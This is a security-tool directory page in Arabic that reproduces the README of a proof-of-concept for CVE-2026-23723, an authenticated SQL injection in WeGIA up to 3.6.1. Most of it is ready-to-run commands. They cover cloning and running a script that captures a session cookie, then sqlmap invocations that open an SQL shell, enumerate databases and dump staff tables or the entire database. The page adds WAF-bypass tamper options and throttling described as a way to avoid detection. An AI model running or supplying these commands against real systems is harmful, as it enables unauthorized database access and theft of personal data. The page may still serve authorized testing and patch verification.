Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-23723-POC — هذا سكربت مساعد خفيف بلغة بايثون مصمم لأتمتة إنشاء ملفات PoC المتوافقة مع sqlmap لثغرة حقن SQL القائمة على الأخطاء والمصادقة في WeGIA (≤ 3.6.1)، والمعروفة باسم GHSA-xfmp-2hf9-gfjp. | Kitploit
أدوات/GitHubGitHub/ch35h1r3c47/cve-2026-23723-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubch35h1r3c47/cve-2026-23723-poc

CVE-2026-23723-POC

هذا سكربت مساعد خفيف بلغة بايثون مصمم لأتمتة إنشاء ملفات PoC المتوافقة مع sqlmap لثغرة حقن SQL القائمة على الأخطاء والمصادقة في WeGIA (≤ 3.6.1)، والمعروفة باسم GHSA-xfmp-2hf9-gfjp.

عرض المستودع
31منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-23723 PoC - أداة مساعدة لاستغلال حقن SQL المصادق عليه في WeGIA

حقن SQL قائم على الأخطاء ومصادق عليه في WeGIA ≤ 3.6.1
GHSA-xfmp-2hf9-gfjp | الإعلان الرسمي

المؤلف الأصلي / مبلّغ الـ PoC: ViniCastro2001 نُشر بواسطة GHSA: nilsonLazarin (مشرف المشروع)

يعمل هذا السكربت الخفيف بلغة Python على أتمتة ما يلي:

  • تسجيل الدخول إلى نظام WeGIA باستخدام بيانات الاعتماد المقدمة
  • استخراج كوكي جلسة PHP صالحة
  • إنشاء ملف طلب متوافق مع sqlmap (نقطة الحقن مُعلَّمة كـ id_memorando=1*)
  • إخراج أوامر sqlmap جاهزة للتشغيل للتعداد، والصدفة التفاعلية، وتفريغ البيانات

الميزات

  • يجرب مسارات تسجيل دخول شائعة متعددة وأسماء حقول نماذج مختلفة لتوافق أفضل
  • ينشئ ملف طلب sqlmap (.req)
  • يوفر أوامر sqlmap جاهزة للنسخ واللصق من أجل:
    • صدفة تفاعلية شبيهة بـ MySQL (--sql-shell)
    • تعداد قواعد البيانات / الجداول
    • تفريغ جدول محدد أو تفريغ قاعدة البيانات بالكامل

المتطلبات

  • Python 3.x
  • مكتبة requests (معظم بيئات اختبار الاختراق تحتوي عليها بالفعل)
  • sqlmap مثبتًا ومضافًا إلى PATH
  • التثبيت

    root@kitploit:~
    git clone https://github.com/Ch35h1r3c47/CVE-2026-23723-POC.git
    cd CVE-2026-23723-POC
    

    الاستخدام

    root@kitploit:~
    # موصى به: موجه كلمة مرور تفاعلي
    python CVE-2026-23723.py --url http://target.com -u admin
    
    # توفير كلمة المرور مباشرة
    python CVE-2026-23723.py --url http://target.com -u admin -p wegia
    
    # ملف إخراج مخصص
    python CVE-2026-23723.py --url http://target.com -u admin -p wegia --output custom.req
    

    بعد التشغيل بنجاح، سيقوم السكربت بما يلي:

    محاولة تسجيل الدخول إنشاء wegia_sqlmap.req (أو اسم الملف المخصص الخاص بك) عرض أوامر sqlmap الجاهزة للاستخدام

    مثال على الأوامر المُنشأة:

    root@kitploit:~
    # 1. صدفة تفاعلية شبيهة بـ MySQL (الأكثر تفضيلاً)
    sqlmap -r wegia_sqlmap.req --sql-shell --batch --dbms=mariadb
    
    # 2. عرض قاعدة البيانات الحالية وجميع قواعد البيانات
    sqlmap -r wegia_sqlmap.req --current-db --dbs --batch
    
    # 3. سرد الجداول في قاعدة بيانات wegia
    sqlmap -r wegia_sqlmap.req -D wegia --tables --batch
    
    # 4. تفريغ جدول محدد (مثال: funcionario)
    sqlmap -r wegia_sqlmap.req -D wegia -T funcionario --dump --threads=2 --batch
    
    # 5. تفريغ قاعدة بيانات wegia بالكامل (بحذر!)
    sqlmap -r wegia_sqlmap.req -D wegia --dump-all --threads=3 --batch --output-dir=./dump
    خيارات sqlmap إضافية:
    
    --proxy=http://127.0.0.1:8080 (عبر Burp/ZAP)
    --tamper=space2comment,randomcase (تجاوز أساسي لـ WAF)
    --delay=1 (إبطاء السرعة لتجنب الاكتشاف)
    

    إذا فشل تسجيل الدخول التلقائي سجّل الدخول يدويًا عبر المتصفح ← انسخ رأس Cookie بالكامل ← شغّل sqlmap مباشرة:

    root@kitploit:~
    sqlmap -u "http://target.com/controle/control.php?nomeClasse=Atendido_ocorrenciaControle&metodo=listarTodosComAnexo&id_memorando=*" \
      --cookie="PHPSESSID=xxxxxxxx; other_cookie=yyy" \
      --sql-shell --batch
    

    إخلاء المسؤولية القانوني يُقدَّم هذا الـ PoC لأغراض تعليمية واختبار الاختراق المصرح به فقط. الاستخدام غير المصرح به ضد أي نظام غير قانوني ومحظور. لا يتحمل المؤلف والمساهمون أي مسؤولية عن سوء الاستخدام أو أي ضرر ناتج. المراجع

    GHSA-xfmp-2hf9-gfjp CVE-2026-23723

    تنزيل الأداة